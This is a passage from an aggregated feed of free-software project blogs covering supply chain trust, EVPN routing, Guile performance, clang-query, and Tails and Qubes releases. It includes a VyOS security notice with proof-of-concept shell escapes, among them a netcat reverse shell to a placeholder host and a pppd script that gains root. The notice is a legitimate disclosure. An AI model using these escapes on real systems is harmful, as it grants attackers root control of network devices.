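assert not hmac.compare_digest(bad_answer, token_expected)  # red light: tampered
```

The key property is that an attacker who reflashes the BIOS cannot produce a valid response without the factory secret, so the token’s light turns red.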

The Software Supply Chain

While the hardware and firmware supply chain attacks get a lot of focus due to their exciting “spy versus spy” nature, software supply chain attacks are a much greater and more present threat today. While many of the hardware and firmware attacks still exist in the realm of the hypothetical, software attacks are much more real. Vendors have been caught installing spyware on their laptops, in some cases multiple times, to collect data to sell to advertisers or to pop up ads of their own. When you can’t audit the code, even a computer direct from the factory might be suspect.

With proprietary operating systems, there’s the risk that comes from not being able to audit the programs you run. A malicious developer or a developer hired by a state actor could add backdoors into the code with no easy way to detect it. This isn’t just a hypothetical risk, as the NSA is suspected of involvement in a back door found in Juniper’s ScreenOS.

If you decide that you can trust your OS vendor you might be comfortable relying on the fact that OS vendors sign their software updates these days so the OS can be sure that the software came directly from the vendor and wasn’t tampered with while it was being downloaded. Yet applications on proprietary operating systems come from multiple sources, not just the OS vendor, and in many cases software you download and install from a website has no way to verify that it hasn’t been tampered with along the way.

Even if you only use software signed by a vendor you still aren’t safe from supply chain attacks. Since you don’t have access to the source code, there’s no way to prove that the signed software that you download from a vendor matches the source code that created it. When developers update software, their code generally goes to a build system that converts it into a binary and performs tests on it before it packages it, signs it, and makes it available to the public. An attacker with access to the build system could implant a back door at some point in the build process after source code has been checked in. With this kind of attack, the malicious code might go unnoticed for quite some time since it isn’t present in the source code itself yet the resulting software would still get signed with the vendor’s signature.

How Purism Protects the Software Supply Chain

Purism has a great advantage over proprietary software vendors when it comes to protecting the software supply chain because we can offer a 100% free software operating system, PureOS, on our laptops. By only installing free software on our laptops, all of the source code in the operating system can be audited by anyone for backdoors or other malicious code. For processed food to be labeled as organic, it must be made only from organic sources, and having our operating system certified as 100% free software means you can trust the software supply chain all the way to the source. Beyond that, all of the software within PureOS is signed and those signatures are verified every time you install new software or update existing software.

Unlike proprietary software, we can also address the risk from an attacker who can inject malicious code somewhere in the build process before it’s signed. With Reproducible Builds you can download the source code used to build your software, build it yourself, and compare your output with the output you get from a vendor. If the output matches, you can be assured that no malicious code was injected somewhere in the software supply chain and it 100% matches the public code that can be audited for back doors. Think of it like the combination of a food safety inspector and an independent lab that verifies the nutrition claims on a box of cereal all rolled into one. We are working to ensure all of the software within PureOS can be reproducibly built and to provide you tools to audit our work. Stay tuned for more details on that.
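The verification step described above boils down to a bit-for-bit comparison of build outputs. A minimal sketch of that check, assuming SHA-256 digests (the artifact bytes below are placeholders, not PureOS tooling):

```python
# Sketch: verifying a reproducible build by comparing cryptographic
# digests of the vendor's binary and an independent local rebuild.
# The artifact bytes below are placeholders, not real packages.
import hashlib

def artifact_digest(artifact: bytes) -> str:
    """SHA-256 hex digest of a build artifact."""
    return hashlib.sha256(artifact).hexdigest()

def is_reproducible(vendor_artifact: bytes, local_rebuild: bytes) -> bool:
    """Reproducible means: same source, same toolchain, identical bits out."""
    return artifact_digest(vendor_artifact) == artifact_digest(local_rebuild)

vendor = b"\x7fELF...package-1.0"
assert is_reproducible(vendor, b"\x7fELF...package-1.0")       # rebuild matches
assert not is_reproducible(vendor, b"\x7fELF...package-1.0!")  # injected change is caught
```

If the digests match, any code injected between source check-in and signing would have to appear in both independent builds, which is exactly what the comparison rules out.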


The supply chain comes down to trust and your ability to audit that trust. Unfortunately all too often a company’s economic incentives run counter to your trust. This is why Purism is registered as a Social Purpose Corporation (SPC) so we can put our ethics and principles above economic incentives. We also continue to improve our own ability to audit the supply chain and isolate (and ultimately eliminate) any proprietary code that remains. Beyond that we are also working to provide you the tools to audit the supply chain (and audit us) yourself, because while we feel you should trust us, your security shouldn’t have to depend on that trust alone.

13 November, 2018 08:21PM by Kyle Rankin

Cumulus Linux

Choosing an EVPN Underlay Routing Protocol

EVPN is all the rage these days. The ability to do L2 extension and L3 isolation over a single IP fabric is a cornerstone to building the next-generation of private clouds. BGP extensions spelled out in RFC 7432 and the addition of VxLAN in IETF draft-ietf-bess-evpn-overlay established VxLAN as the datacenter overlay encapsulation and BGP as the control plane from VxLAN endpoint (VTEP) to VxLAN endpoint. Although RFC 7938 tells us how to use BGP in the data center, it doesn’t discuss how it would behave with BGP as an overlay as well. As a result, every vendor seems to have their own ideas about how we should build the “underlay” network to get from VTEP to VTEP, allowing BGP-EVPN to run over the top.

An example of a single leaf’s BGP peering for EVPN connectivity from VTEP to VTEP

Let’s take a look at our options in routing protocols we could use as an underlay and understand the strengths and weaknesses that make them a good or bad fit for deployment in an EVPN network. We’ll go through IS-IS, OSPF, iBGP and eBGP. I won’t discuss EIGRP: although it has now been published as an RFC, it’s still not widely supported by other networking vendors.

IS-IS or OSPF as an Underlay

IS-IS is an old protocol. So old it predates the ratification of OSPF as an IETF standard. IS-IS, just like OSPF, is a link-state protocol. Instead of areas IS-IS uses “levels” to break up the flooding domains of routers. OSPF areas determine where LSAs are flooded, while IS-IS levels determine where IS-IS LSPs are flooded. The terms are different but the concepts are almost identical.

OSPFv2 is a well-understood protocol among network engineers; however, its biggest limitation is that it is IPv4-only. OSPFv2 has no way to carry IPv6 routes. OSPFv3 was developed to support IPv6 routes and was later extended to support IPv4 routes as well. IS-IS, on the other hand, has supported both IPv4 and IPv6 routes for years. A common reason for enterprises and service providers to deploy IS-IS was its single-protocol handling of both IPv4 and IPv6 prefixes. OSPFv3 as a dual-stack protocol is still a relatively new extension by comparison. It’s not uncommon to see OSPFv2 deployed for IPv4 along with OSPFv3 for IPv6 in the same network. When building our underlay we should think IPv6 first, even if no IPv6 services exist today. If a new network is being built, do things right from the beginning. Since OSPFv2 does not support IPv6, this makes it a poor choice not only as an underlay protocol for EVPN but for a new datacenter in general. And considering that OSPFv3 may not support IPv4 in all implementations, this leaves only IS-IS as the protocol we should consider.

Conventional wisdom with link-state protocols historically recommended limiting the number of routers and links in an area or level to prevent the database from growing too large and the Shortest Path First (SPF) calculation from taking too long. Most of those recommendations, particularly those suggesting as low as 200 routers in an area, are no longer valid. These suggestions were made for routers with single-core processors running at 600 MHz or less. Today, most datacenter switching platforms use 4-6 core processors as fast as 2.8 GHz, more than enough processing power for thousands of devices in a single area. Even for large datacenter networks, scaling is not an issue for link-state protocols today.

The next consideration with link-state protocols is route filtering. Link-state protocols require every device in an area or level to have an identical picture of the network from which to determine the best path; otherwise, loops could form. To accomplish this, route filtering is only allowed between levels or areas. We want uniformity and consistency in the datacenter, but reality is often not that kind to us in networking. There is always a rack, or a set of racks, or an extranet connection that requires special route filtering. A simple datacenter design puts everything in a single area, but this kind of exception makes filtering difficult or impossible. It may be that we never need to filter within the datacenter, but it’s an important consideration when deciding which protocol to deploy.

Finally, we need to consider peering and addressing within the underlay network. Cumulus has added support for OSPFv2 unnumbered, removing the requirement of assigning a /30 or /31 on every single interface in the datacenter fabric. OSPFv3 peers over IPv6 link-local addresses, meaning there is also no requirement for /30 or /31 IPs on the point-to-point datacenter links. IS-IS is a little different: it does not use IP at all, instead relying on a protocol called CLNS to find peers and exchange routes. As a result, once again no IPs are required in the datacenter fabric. This means any of the protocols pass the addressing test; just be sure OSPFv2 unnumbered is an option.

With all that being said, don’t forget that these link-state protocols all share state. If one device in the network changes, that information must be flooded to everyone. BGP, on the other hand, only sends this information to its immediate neighbors, limiting the “blast radius” or area of impact of bad behavior. Ivan Pepelnjak has a fantastic blog post that briefly describes the problem with link-state protocols.

Now that we understand the considerations with deploying OSPF or IS-IS as an underlay, the important thing to remember is that with either protocol, we still have to run BGP over the top. This means that we are always configuring, troubleshooting and maintaining two routing protocols to enable EVPN. No matter how simple we can make the link-state protocol, it will still fall short. Since RFC 7938 describes how to build a BGP based underlay network and we require BGP for EVPN, there’s no motivation for either OSPF or IS-IS as an underlay.

The Case for BGP

When considering BGP in the datacenter we can use either iBGP or eBGP. Although RFC 7938 recommends eBGP, let’s discuss deploying iBGP in the datacenter first.

iBGP requires a full mesh of BGP peers; every router must create a BGP neighbor relationship with every other BGP speaker in the network. The solution to this is to deploy route reflectors to limit the number of peerings that are required in the environment. Even looking at a spine and leaf topology it’s easy to see that the spines should be deployed as iBGP route reflectors.

With iBGP, route reflectors are required on the spines

The first problem here is that even with spines as route reflectors, we still require spine-to-spine iBGP peering. If only some of the spines act as route reflectors, the non-reflecting spines need to peer with the route reflectors. If we make all spines route reflectors, we then need to define route reflector cluster IDs and still peer some route reflectors together to provide redundancy. The main reason is that under a dual leaf uplink failure, the leaf will respect iBGP rules and will not send routes learned from one iBGP neighbor to another iBGP neighbor.

A simplified diagram, but without redundant Route Reflectors a dual failure like this would prevent routing information from being sent from the non-RR spine.

Another possible solution would be to make all devices route reflectors, but this will lead to path hunting, seriously impacting network convergence time. Dinesh does a great job of detailing path hunting in his BGP in the Datacenter book.

The added complexity of designing route reflector clusters and managing the route reflector failure conditions makes iBGP the wrong choice in my book.

Using eBGP

Now that leaves us with eBGP as the last choice. As mentioned already, RFC 7938 gives us a number of the operational details we need to run eBGP, but let’s look at a few of them.

First, using private ASNs gives us 1023 2-byte private ASNs, or we can use 4-byte ASNs and have over 42 million available to use within the data center. In a standard two-tier Clos we would assign a unique ASN per leaf switch and a single ASN to every spine. It’s important that every leaf switch is in a unique ASN; otherwise, BGP loop-prevention rules will drop routes whose AS path already contains the switch’s own ASN. You can override this behavior with a configuration knob like “allowas-in” or BGP’s “local-as” feature, but more knobs means more complexity with no value.

An example of how BGP ASNs are assigned in an eBGP fabric

Some vendors are pushing designs like this to allow for EVPN and you should always ask what value that additional complexity actually provides.
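The numbering scheme described above can be sketched in a few lines. The base ASN values here are arbitrary choices for illustration, not a Cumulus convention:

```python
# Sketch: 2-byte private ASN assignment in a two-tier Clos fabric --
# one ASN shared by all spines, a unique ASN per leaf, so that standard
# eBGP loop prevention (a router rejects paths containing its own ASN)
# drops looped routes with no extra knobs. Base values are arbitrary.
PRIVATE_ASN_MAX = 65534  # 2-byte private range: 64512-65534, 1023 ASNs
SPINE_ASN = 65000        # every spine shares this ASN
LEAF_ASN_BASE = 65001    # leaves count up from here

def leaf_asn(leaf_index: int) -> int:
    asn = LEAF_ASN_BASE + leaf_index
    if asn > PRIVATE_ASN_MAX:
        raise ValueError("2-byte private range exhausted; switch to 4-byte ASNs")
    return asn

leaves = [leaf_asn(i) for i in range(4)]
assert leaves == [65001, 65002, 65003, 65004]
assert len(set(leaves)) == len(leaves)  # no duplicate leaf ASNs
```

Keeping the assignment this mechanical is what makes the fabric easy to automate; if a design needs “allowas-in” or “local-as” to work around duplicate leaf ASNs, that is a sign of avoidable complexity.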

With Cumulus Linux’s BGP unnumbered there is no need to coordinate ASNs across devices in the configuration, since we can just use “net add bgp neighbor swp1 interface remote-as external” to configure an eBGP peer on the interface swp1 without specifying the remote-as number, only that it’s an eBGP peer.

We can use this single eBGP session to carry IPv4, IPv6 and EVPN traffic throughout the fabric. An initial concern may be passing EVPN information from leaf to spine, since the spines are not directly participating in EVPN; however, it’s only data. These routes do not need to be installed on the spines, which act similarly to route reflectors, passing routing information from leaf to leaf.

The explicit configuration that BGP provides makes for easy automation, and the single BGP session enables the end-to-end fabric for whatever you throw at it. Combine this with the operational ease spelled out in RFC 7938 and the case for eBGP should be obvious!

Go try it yourself. You can run our EVPN demo either on your laptop with Cumulus Vx or in our datacenter with Cumulus in the Cloud!

The post Choosing an EVPN Underlay Routing Protocol appeared first on Cumulus Networks engineering blog.

13 November, 2018 08:00PM by Pete Lumbis

ZEVENET


FileCloud load balancing article

This week, a new article is available in the howto section of the Knowledge Base. FileCloud enables a private cloud that makes your files accessible from any device, anywhere, and also synchronizes them across computers. It helps users share files seamlessly within or outside an organization. Check out the article to learn more about high availability and scaling FileCloud!


13 November, 2018 04:37PM by Zevenet


IT from the city, for the city – the first marketplace of digital possibilities

After the successful and exciting Open Government Day on Thursday, the hall of the Old Town Hall in Munich was transformed for the first time into the Marketplace of Digital Possibilities on Friday, October 26, 2018. For this, municipal employees … Read more

The post IT from the city, for the city – the first marketplace of digital possibilities appeared first on the Münchner IT-Blog.

13 November, 2018 08:22AM by Lisa Zech


Grml developers

Frank Terbeck: That Scheme Performance

At this point, Scheme is my favourite language to program in. And my preferred implementation (…there are a lot) is GNU Guile. I've written a couple of pieces of software using it: Bindings for termios on POSIX Systems, An implementation of Linear Feedback Shift Registers, A unit test framework that emits TAP output, A system that produces time-sheets from Redmine Timing exports, An elaborate system to describe and experiment with configurable electronic parts and a native implementation of the XMMS2 protocol and client library. The latter I've written about before.

Now with Guile there's a lot going on. The project has a small but dedicated team of developers. And they have been working on improving the system's performance by a lot. For the longest time, Guile only had an interpreter. The last version of that was 1.8 — the version I came in contact with for the first time as well. Shortly after I started to dabble, 2.0 was released, so I didn't have a lot of exposure to 1.8. Version 2.0 added a stack VM that Guile byte-compiled its code to. In 2017 the project released version 2.2, which saw the stack VM replaced by a register VM. And that improved performance dramatically. And now, they are preparing a 3.0 release (the 2.9.1 beta release happened on October 10th of this year), which adds just-in-time native code generation on x86-64 via GNU Lightning.

I used xmms2-guile to get an idea of the improvements that the different Guile versions offer. I couldn't be arsed to build myself a 1.8 release, so this won't look at that. The setup is a minimal client connecting to an XMMS2 server, pulling out the information required to display a playlist of about 15300 tracks. All of this is running on an Intel Core i7 with plenty of memory, running XMMS2 version 0.8 DrO_o (git commit: 3bd868a9).

As a point of comparison, I ran XMMS2's command line client to do the same task. It took a mean time of 10.77 seconds. That's about 1420 tracks processed per second. I'm pretty sure the client does a little more than it needs to, but this establishes a ballpark.

With Guile 2.0 the whole affair takes 23.9 seconds. That's about 640 tracks per second. Quite a bit slower. More than twice as slow. I was sure this would be slower than the official client, but the difference is disappointing. So what about 2.2 — can it do better?

Well, in Guile 2.2 the same job takes 6.38 seconds. 2400 tracks per second! Impressive. This is why I think the official CLI client implemented in C does a little more work than it needs to. It shouldn't lose to this, and if it did, it shouldn't be behind by this much. My xmms2-guile client library is a native implementation. It doesn't wrap the official XMMS2 client library that's written in C. I'm way too lazy to do detailed timing analyses of the different libraries and Scheme implementations. The results are reproducible, though.

Now what about the upcoming Guile 3.0? I've used the 2.9.1 beta, to be precise. It should execute a little faster, but the 2.2 results are pretty good already. Running the same setup yields a mean time of 5.87 seconds. A bit over 2600 tracks per second.
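The throughput numbers quoted throughout this post all come from the same arithmetic, playlist size divided by mean wall time; redoing it confirms the roughly fourfold speedup from 2.0 to the 3.0 beta. The labels below are mine, the timings are the ones reported above:

```python
# Recompute the tracks-per-second figures from the reported mean times.
TRACKS = 15300  # playlist size used in all runs

mean_seconds = {
    "xmms2 CLI (C)": 10.77,
    "Guile 2.0": 23.9,
    "Guile 2.2": 6.38,
    "Guile 2.9.1 (3.0 beta)": 5.87,
}

tracks_per_second = {name: TRACKS / t for name, t in mean_seconds.items()}
assert round(tracks_per_second["xmms2 CLI (C)"]) == 1421           # "about 1420"
assert round(tracks_per_second["Guile 2.0"]) == 640                # "about 640"
assert round(tracks_per_second["Guile 2.2"]) == 2398               # "2400 tracks per second!"
assert round(tracks_per_second["Guile 2.9.1 (3.0 beta)"]) == 2606  # "a bit over 2600"

# The closing claim: 3.0 is roughly four times as fast as 2.0.
speedup = mean_seconds["Guile 2.0"] / mean_seconds["Guile 2.9.1 (3.0 beta)"]
assert 4.0 < speedup < 4.2
```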

I mean sure, this is not an in-depth analysis, there's a local network connection involved and it's a rather specific repetitive task. Still though. Pretty cool when a random test shows that 3.0 is four times as fast as 2.0. ;)

13 November, 2018 01:33AM

Tails


Tails report for October, 2018


The following changes were introduced in Tails 3.10.1:

  • Hide the PIM option when unlocking VeraCrypt volumes because PIM won't be supported until Tails 4.0. (#16031)

  • Rename the buttons in the confirmation dialog of Tails Installer to Install (or Upgrade) and Cancel to be less confusing. (#11501)


We finalized our work on the Additional Software feature. Small bugfixes will be shipped in the next release.

We are very proud that our work to unlock VeraCrypt volumes has landed in GNOME and is being included in other distributions, as mentioned in the release announcement of Ubuntu Cosmic Cuttlefish.

Distributing USB images

We started working on distributing USB images which will make installing Tails much easier on Windows and macOS:

  • We have a first version of the code to transform ISO images into USB images (#15293).

  • We wrote the instructions to install a USB image on Debian using GNOME Disks (#15659), and on Windows (#15808) and macOS (#15809) using Etcher.

This work will be released in Tails 3.12 (January 29).

Documentation and website

  • We updated our roadmap for the next 2 years.

Hot topics on our help desk

  1. Several users reported #14754, Keyboard and mouse do not work after upgrading, but that was fixed in Tails 3.10.1.

  2. Many users are suffering from #15978 and are unable to automatically install software on their persistence, sometimes after interrupting the upgrade process.


  • Following-up on a process started in September, we were able to give more Tails developers access to our Jenkins CI platform. This should make their work more pleasurable and efficient.

  • We made great progress on our new DIY low-power backup server. We received the hardware, had great fun with Dremel tools and epoxy resin to make everything fit into the case, and finally installed the operating system. And what about… pictures? Here they are! :)

  • We did most of the work that will allow us to remove the outdated Gitolite instance we run on one of our systems. (#14587)

  • We ordered new drives to expand the storage capacity of our main server. (#16041)


We launched our yearly donation campaign and raised 18% of our goal in the first 2 weeks.


Past events


All the website

  • de: 51% (3148) strings translated, 6% strings fuzzy, 45% words translated
  • es: 58% (3593) strings translated, 1% strings fuzzy, 48% words translated
  • fa: 32% (1993) strings translated, 9% strings fuzzy, 34% words translated
  • fr: 88% (5412) strings translated, 1% strings fuzzy, 87% words translated
  • it: 33% (2063) strings translated, 4% strings fuzzy, 29% words translated
  • pt: 26% (1622) strings translated, 7% strings fuzzy, 22% words translated

Total original words: 64357

Core pages of the website

  • de: 83% (1580) strings translated, 8% strings fuzzy, 83% words translated
  • es: 97% (1851) strings translated, 1% strings fuzzy, 96% words translated
  • fa: 32% (615) strings translated, 12% strings fuzzy, 31% words translated
  • fr: 98% (1872) strings translated, 1% strings fuzzy, 98% words translated
  • it: 70% (1337) strings translated, 13% strings fuzzy, 69% words translated
  • pt: 45% (859) strings translated, 12% strings fuzzy, 48% words translated

Total original words: 17343


We wrote some code on the download page to compute download metrics in the future. (#14922).

  • Tails has been started more than 743,676 times this month. This makes 23,990 boots a day on average.
  • 10,158 downloads of the OpenPGP signature of Tails ISO from our website.
  • 117 bug reports were received through WhisperBack.

How do we know this?

13 November, 2018 01:23AM

November 12, 2018


Ubuntu developers

The Fridge: Ubuntu Weekly Newsletter Issue 553

Welcome to the Ubuntu Weekly Newsletter, Issue 553 for the week of November 4 – 10, 2018. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

12 November, 2018 10:21PM

Qubes


Qubes OS 3.2.1 has been released!

We’re pleased to announce the stable release of Qubes 3.2.1! As we previously announced, this is the first and only planned point release for version 3.2. Since no major problems were discovered with 3.2.1-rc1, this stable release is not significantly different from the release candidate. Features:

  • Fedora 28 TemplateVM
  • Debian 9 TemplateVM
  • Whonix 14 Gateway and Workstation TemplateVMs
  • Linux kernel 4.14

Release 3.2.1 has replaced Release 3.2 on the Downloads page.

What is a point release?

A point release does not designate a separate, new version of Qubes OS. Rather, it designates its respective major or minor release (in this case, 3.2) inclusive of all updates up to a certain point. Installing Qubes 3.2 and fully updating it results in the same system as installing Qubes 3.2.1.

What should I do?

If you’re currently using an up-to-date Qubes 3.2 installation, then your system is already equivalent to a Qubes 3.2.1 installation. No action is needed.

Regardless of your current OS, if you wish to install (or reinstall) Qubes 3.2 for any reason, then the 3.2.1 ISO will make this more convenient and secure, since it bundles all Qubes 3.2 updates to date. It will be especially helpful for users whose hardware is too new to be compatible with the original Qubes 3.2 installer.

As a reminder, Qubes 3.2 (and, therefore, Qubes 3.2.1) is scheduled to reach EOL (end-of-life) on 2019-03-28.

What about Qubes 4.0.1?

We recently announced the release of 4.0.1-rc1. You can help us test this release candidate and report any bugs you encounter so that they can be fixed before the stable release.

12 November, 2018 12:00AM

November 11, 2018

Ubuntu developers

Stephen Kelly: Future Developments in clang-query

Getting started – clang-tidy AST Matchers

Over the last few weeks I published some blogs on the Visual C++ blog about Clang AST Matchers. The series can be found here:

I am not aware of any similar series existing which covers creation of clang-tidy checks, and use of clang-query to inspect the Clang AST and assist in the construction of AST Matcher expressions. I hope the series is useful to anyone attempting to write clang-tidy checks. Several people have reported to me that they have previously tried and failed to create clang-tidy extensions, due to various issues, including lack of information tying it all together.

Other issues with clang-tidy include the fact that it relies on the “mental model” a compiler has of C++ source code, which might differ from the “mental model” of regular C++ developers. The compiler needs to have a very exact representation of the code, and needs to have a consistent design for the class hierarchy representing each standard-required feature. This leads to many classes and class hierarchies, and a difficulty in discovering what is relevant to a particular problem to be solved.

I noted several problems in those blog posts, namely:

  • clang-query does not show AST dumps and diagnostics at the same time
  • Code completion does not work with clang-query on Windows
  • AST Matchers which are appropriate to use in particular contexts are difficult to discover
  • There is no tooling available to assist in discovery of source locations of AST nodes

Last week at code::dive in Wroclaw, I demonstrated tooling solutions to all of these problems. I look forward to video of that talk (and videos from the rest of the conference!) becoming available.

Meanwhile, I’ll publish some blog posts here showing the same new features in clang-query and clang-tidy.

clang-query in Compiler Explorer

Recent work by the Compiler Explorer maintainers adds the possibility to use source code tooling with the website. Compiler Explorer now contains new menu entries to enable a clang-tidy pane.

clang-tidy in Compiler Explorer

I demonstrated use of Compiler Explorer to run the clang-query tool at the code::dive conference, building upon the recent work by the Compiler Explorer developers. This feature will land upstream in time, but can be used with my own AWS instance for now. It is suitable for exploring the effect that changing source code has on match results and, orthogonally, the effect that changing the AST Matcher has on the match results. It is also accessible via

It is important to remember that Compiler Explorer is running clang-query in script mode, so it can process multiple let and match calls, for example. The new command set print-matcher true helps distinguish which matcher causes which output. The help command is also available and lists the new features.

The issue of clang-query not printing both diagnostic information and AST information at the same time means that users of the tool need to alternate between writing

set output diag

and
set output dump

to access the different content. Recently, I committed a change to make it possible to enable both dump and diag output from clang-query at the same time. The new commands follow the same structure as the set output command:

enable output dump
disable output dump

The set output <feature> command remains as an “exclusive” setting to enable only one output feature and disable all others.
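Putting the pieces together, a script-mode input using these commands might look like the following sketch (illustrative only; the matcher and the binding name are arbitrary):

```
set print-matcher true
enable output diag
enable output dump
match functionDecl().bind("f")
```

With both outputs enabled, each match is reported with its diagnostic source range and the corresponding AST dump in a single pass.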

Dumping possible AST Matchers

This command design also enables the possibility of extending the features which clang-query can output. Up to now, developers of clang-tidy extensions had to inspect the AST corresponding to their source code using clang-query and then use that understanding of the AST to create an AST Matcher expression.

That mapping to and from the AST “mental model” is not necessary. New features I am in the process of upstreaming to clang-query enable the output of AST Matchers which may be used with existing bound AST nodes. The command

enable output matcher

causes clang-query to print out all matcher expressions which can be combined with the bound node. This cuts out the requirement to dump the AST in such cases.

Inspecting the AST is still useful as a technique to discover possible AST Matchers and how they correspond to source code. For example if the functionDecl() matcher is already known and understood, it can be dumped to see that function calls are represented by the CallExpr in the Clang AST. Using the callExpr() AST Matcher and dumping possible matchers to use with it leads to the discovery that callee(functionDecl()) can be used to determine particulars of the function being called. Such discoveries are not possible by only reading AST output of clang-query.
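As a sketch of that workflow, a hypothetical clang-query session using the new output might look like:

```
enable output matcher
match callExpr().bind("c")
```

For each bound node, clang-query would then list matcher expressions, such as callee(functionDecl()), that can be composed with callExpr() — without first having to study an AST dump.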

Dumping possible Source Locations

The other important discovery space in creation of clang-tidy extensions is that of Source Locations and Source Ranges. Developers creating extensions must currently rely on the documentation of the Clang AST to discover available source locations which might be relevant. Usually though, developers have the opposite problem. They have source code, and they want to know how to access a source location from the AST node which corresponds semantically to that line and column in the source.

It is important to use a semantically relevant source location in order to build reliable tools which refactor at scale and without human intervention. For example, a cursory inspection of the locations available from a FunctionDecl AST node might lead to the belief that the return type is available at the getBeginLoc() of the node.

However, this is immediately challenged by the C++11 trailing return type feature, where the actual return type is located at the end. For a semantically correct location, you must currently use


It should be possible to use getReturnTypeSourceRange(), but a bug in clang prevents that, as it does not account for the trailing return type feature.

Once again, my new output feature of clang-query presents a solution to this discovery problem. The command

enable output srcloc

causes clang-query to output the source locations by accessor and caret corresponding to the source code for each of the bound nodes. By inspecting that output, developers of clang-tidy extensions can discover the correct expression (usually via the clang::TypeLoc hierarchy) corresponding to the source code location they are interested in refactoring.

Next Steps

I have made many more modifications to clang-query which I am in the process of upstreaming. My Compiler Explorer instance is listed as the ‘clang-query-future’ tool, while the clang-query-trunk tool runs the current trunk version of clang-query. Both can be enabled for side-by-side comparison of the future clang-query with the existing one.

11 November, 2018 10:46PM

VyOS


The "operator" level has been proven insecure and will be removed in upcoming releases

The operator level in VyOS is a legacy feature inherited from the forked Vyatta Core code. It was always relatively obscure, and I don't think anyone really trusted its security, for good reason: with our current CLI architecture, real privilege separation is impossible.

Security researcher Rich Mirch found multiple ways to escape the restricted shell and execute commands with root permissions for the operator level users. Most of those would take a lot of effort to fix, and it's not clear if some of those can be fixed at all. Since any new implementation of a privilege separation system will be incompatible with the old one, and leaving operator level in the system is best described as "security theater", in the next releases that feature will be removed and operator level users will be converted to admin level users.

We will use the "id" UNIX command for demonstration since it's harmless but is not supposed to be available for operator level users. Here are proofs of concept for all vulnerabilities reported by Rich:

Restricted shell escape using the telnet command

Proof of concept:
user1@vyos> telnet ";bash"
telnet: can't connect to remote host ( Connection refused
# we are now in real, unrestricted bash

user1@vyos> id
uid=1001(user1) gid=100(users) groups=100(users),...

This problem could potentially be fixed, but since there's no way to introduce global input sanitization, every command would have to be checked and protected individually.
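The underlying class of bug is shell metacharacter injection. The following Python sketch (illustrative only, not VyOS code) shows why interpolating an untrusted argument into a shell command line is dangerous, while passing an argument vector is not:

```python
import subprocess

# An untrusted argument such as an operator might supply to "telnet"
arg = "; echo INJECTED"

# Interpolated into a shell command line, the metacharacters execute:
unsafe = subprocess.run("echo connecting to" + arg,
                        shell=True, capture_output=True, text=True)

# Passed as an argument vector, the string stays a literal argument:
safe = subprocess.run(["echo", "connecting to", arg],
                      capture_output=True, text=True)

print(unsafe.stdout)  # the injected echo ran as a second command
print(safe.stdout)    # the argument was printed verbatim
```

This is exactly why, without a central sanitization layer, every restricted command needs its own careful argument handling.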

Restricted shell escape using the "monitor command" command

The "monitor command" command allows operator level users to execute any command. Using it in combination with netcat it's possible to launch an unrestricted bash shell:

user1@vyos> monitor command "$(netcat -e /bin/bash 192.168.x.x 9003)"

Connection from 192.168.x.x:59952
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

Restricted shell escape using the traffic dump filters

user1@vyos> monitor interfaces ethernet eth0 traffic detail unlimited filter "-w /dev/null 2>/dev/null & bash"
Capturing traffic on eth0 ...

uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

Restricted shell escape using backtick evaluation as a set command argument

user1@vyos> set "`/bin/bash`"

user1@vyos> id >/dev/tty
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

This one is special because there may not be a way to fix it at all.

Local privilege escalation using pppd connection scripts

Operator level users are allowed to call pppd for the connect/disconnect commands. Since pppd is executed with root permissions, a malicious operator can execute arbitrary commands as root using a custom PPP connection script.

user1@vyos> echo "id >/dev/tty" >
user1@vyos> chmod 755

Execute the id command as root using the sudo /sbin/pppd command.

user1@vyos> sudo /sbin/pppd connect $PWD/
uid=0(root) gid=0(root) groups=0(root)

11 November, 2018 08:56PM by Daniil Baturin

Tails


Our achievements in 2018

On October 12, we started our yearly donation campaign. Today, we summarize what we achieved with your help in 2018 and renew our call for donations.

New features

  • We integrated VeraCrypt in the desktop to allow you to work with encrypted files across different operating systems (Windows, Linux, and macOS).

    This work was done upstream in GNOME and will be available outside of Tails in Debian 10 (Buster) and Ubuntu 18.10 (Cosmic Cuttlefish).

  • Additional Software allows you to install additional software automatically when starting Tails.

    Add vlc to your additional software? 'Install Only Once' or 'Install Every Time'

  • We added a screen locker to give you some protection if you leave your Tails unattended, willingly or not.

  • We completely redesigned our download page and verification extension to make it easier to get and verify Tails. It is also now possible to verify Tails from Chrome.


  • Tails was used approximately 22 000 times a day.

  • We did more usability work than ever before. Every new feature was tested with actual users to make sure Tails becomes easier to use.

  • We answered 1123 bug reports through our help desk and helped all these people to be safer online.

Under the hood

  • We released 11 new versions of Tails to continue offering improvements and security fixes as soon as possible, including 4 emergency releases. This year we've faced critical security issues like Spectre, Meltdown, EFAIL, and issues in Firefox and are working hard to always have your back covered!

  • We made the build of Tails completely reproducible, which brings even more trust in the ISO images that we are distributing, a faster release process, and slightly smaller upgrades.

  • We greatly diversified our sources of income. Thanks to all of you, the share of donations that we got from individuals increased from 17% to 34%. This made our organization more robust and independent.


  • We published a social contract to clarify the social commitments that we stand by as Tails contributors.

  • We attended 12 conferences and connected to free software and Internet freedom communities in 8 different countries, including Chaos Computer Congress (Germany), FOSDEM (Belgium), Internet Freedom Festival (Spain), Tor Meeting (Italy and Mexico), Debian Conference (Taiwan), and CryptoRave (Brazil).

  • We grew our pool of regular contractors with 4 new workers, mostly to work on our core code and infrastructure. These include several very skilled Debian developers.

All of this is made possible by donations from people like you. And because they help us to plan our work, we particularly appreciate monthly and yearly donations, even the smallest ones.

If you liked our work in 2018, please take a minute to donate and make us thrive in 2019!

11 November, 2018 08:00AM

November 10, 2018

SparkyLinux


Sparky 4.9 celebrates 100 years of Poland’s Independence

New live/install iso images of SparkyLinux 4.9 “Tyche” are available to download.
Sparky 4 is based on Debian stable line “Stretch” and built around the Openbox window manager.

Sparky 4.9 offers a fully featured operating system with the lightweight LXDE desktop environment, plus minimal images of MinimalGUI (Openbox) and MinimalCLI (text mode) which let you install the base system with a desktop of your choice and a minimal set of applications, via the Sparky Advanced Installer.

